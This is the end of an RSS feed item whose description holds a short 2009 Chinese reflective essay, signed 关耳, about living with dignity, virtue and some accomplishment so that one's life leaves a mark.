		<description><![CDATA[(2009-04-09 20:55:21)&nbsp;&nbsp; 关耳<br/>人的一生怎样都可以度过，默默无闻的是一生，煊煊赫赫的也是一生。但为人者总要对生命负责。伟大、英雄未必人人能够，但总得建功立德，总要活出人的尊严。有本事要靠本事，没本事也要有德行。生命可以承受无边的苦难，但承受不了无足轻重；生命可以承受贫病交加，但承受不了同类的冷落；生命可以承受挫折失败，但承受不了尊严的失缺；生命也可以承受忍辱负重，但它承受不了永无成功的荣耀。一个人在百年之内总得为自己的生命挣得一点自豪与骄傲，也应该在自己力所能及的层级上，为生命挣下一两次可以在众人之中君临端坐的首席之位。即使生命对此并无奢求，也要有一点点创造，有一点点作为，来证明自己曾在这个世界上活过。 ]]></description>
		</item>
		
</channel>
</rss>
